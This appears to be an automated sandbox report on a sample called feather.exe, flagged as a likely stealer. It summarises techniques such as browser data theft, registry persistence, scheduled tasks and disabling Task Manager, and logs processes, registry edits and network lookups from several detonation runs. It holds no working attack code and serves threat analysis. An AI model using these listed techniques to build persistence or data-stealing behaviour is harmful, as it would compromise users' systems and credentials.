Malware Analysis Report

2025-06-15 20:00

Sample ID 240611-wd7kvawamq
Target feather.exe
SHA256 a4c5f72184b8bb06b6202074d1c81469ea56f74dace70d09fb5c798f85d8b700
Tags
evasion execution persistence spyware stealer
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK (Enterprise Matrix V15)

Analysis: static1 (Detonation Overview, Signatures)

Analysis: behavioral23, behavioral7, behavioral19, behavioral22, behavioral24, behavioral25, behavioral3, behavioral5, behavioral6, behavioral8, behavioral10, behavioral11, behavioral16, behavioral21, behavioral1, behavioral2, behavioral4, behavioral9, behavioral12, behavioral17, behavioral20, behavioral13, behavioral14, behavioral15, behavioral18 (each with Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

score
8/10

SHA256

a4c5f72184b8bb06b6202074d1c81469ea56f74dace70d09fb5c798f85d8b700

Threat Level: Likely malicious

The file feather.exe was found to be: Likely malicious.

Malicious Activity Summary

evasion execution persistence spyware stealer

Disables Task Manager via registry modification

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Drops startup file

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Drops file in System32 directory

Enumerates physical storage devices

Program crash

Unsigned PE

Opens file in notepad (likely ransom note)

Kills process with taskkill

Detects videocard installed

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SendNotifyMessage

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Modifies Internet Explorer settings

Suspicious use of FindShellTrayWindow

Creates scheduled task(s)

Views/modifies file attributes

Suspicious behavior: GetForegroundWindowSpam

Modifies registry class

Checks processor information in registry

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-11 17:50

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win10v2004-20240508-en

Max time kernel

137s

Max time network

155s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\vulkan-1.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\vulkan-1.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win7-20240221-en

Max time kernel

134s

Max time network

133s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\LICENSES.chromium.html

Signatures

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 505c754a28bcda01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{757DBF51-281B-11EF-8E23-7EEA931DE775} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "424290255" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000aaf38deff3e8ec4d8894b2d599e8a3070000000002000000000010660000000100002000000026e3ed6f231ad3c069ae0cb575519e6448caf41614c0d584ea34eed06580d055000000000e80000000020000200000003c3d671e76bcd19fc3670c601537b5eeb4e16d1c7679bfbdc62799ea432a75002000000023af3187d474cbaf6f7686de676d534e8d0aeb814f3337510a6982f4e54a266240000000c8355d7fa31256d579937beba33a323f64b6d1cdf80c2edbc70e9249e98ad189e8e298e2cca39b3194e6008dac70518b00149935208340557f557ab8947d4b13 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\LICENSES.chromium.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2876 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Cab4B36.tmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\Local\Temp\Tar4C56.tmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (listed 18 times with differing hashes)

Analysis: behavioral19

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:56

Platform

win10v2004-20240226-en

Max time kernel

155s

Max time network

174s

Command Line

"C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe

"C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3724 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 105.83.221.88.in-addr.arpa udp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 13.107.253.64:443 tcp
US 8.8.8.8:53 76.234.34.23.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 100.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 142.250.187.234:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 234.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 79.239.69.13.in-addr.arpa udp

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win7-20240221-en

Max time kernel

118s

Max time network

125s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\vulkan-1.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2256 wrote to memory of 2732 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\WerFault.exe
PID 2256 wrote to memory of 2732 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\WerFault.exe
PID 2256 wrote to memory of 2732 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\WerFault.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\vulkan-1.dll,#1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2256 -s 100

Network

N/A

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win7-20240508-en

Max time kernel

121s

Max time network

124s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2488 -s 220

Network

N/A

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win10v2004-20240426-en

Max time kernel

90s

Max time network

140s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2976 wrote to memory of 4256 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2976 wrote to memory of 4256 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2976 wrote to memory of 4256 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 4256 -ip 4256

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 612

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 43.43.201.23.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win7-20240508-en

Max time kernel

118s

Max time network

120s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2796 -s 220

Network

N/A

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win7-20240221-en

Max time kernel

122s

Max time network

126s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1816 -s 220

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win10v2004-20240426-en

Max time kernel

90s

Max time network

94s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1928 wrote to memory of 4276 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1928 wrote to memory of 4276 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1928 wrote to memory of 4276 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4276 -ip 4276

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4276 -s 612

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 9.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win10v2004-20240508-en

Max time kernel

145s

Max time network

157s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\LICENSES.chromium.html

Signatures

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1952 wrote to memory of 4860 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4864 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\LICENSES.chromium.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff858fa46f8,0x7ff858fa4708,0x7ff858fa4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3372 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3372 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4496 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4492 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1440 /prefetch:2

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 439b5e04ca18c7fb02cf406e6eb24167
SHA1 e0c5bb6216903934726e3570b7d63295b9d28987
SHA256 247d0658695a1eb44924a32363906e37e9864ba742fe35362a71f3a520ad2654
SHA512 d0241e397060eebd4535197de4f1ae925aa88ae413a3a9ded6e856b356c4324dfd45dddfef9a536f04e4a258e8fe5dc1586d92d1d56b649f75ded8eddeb1f3e2

\??\pipe\LOCAL\crashpad_1952_HCZBFPHWHOKWPETG

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
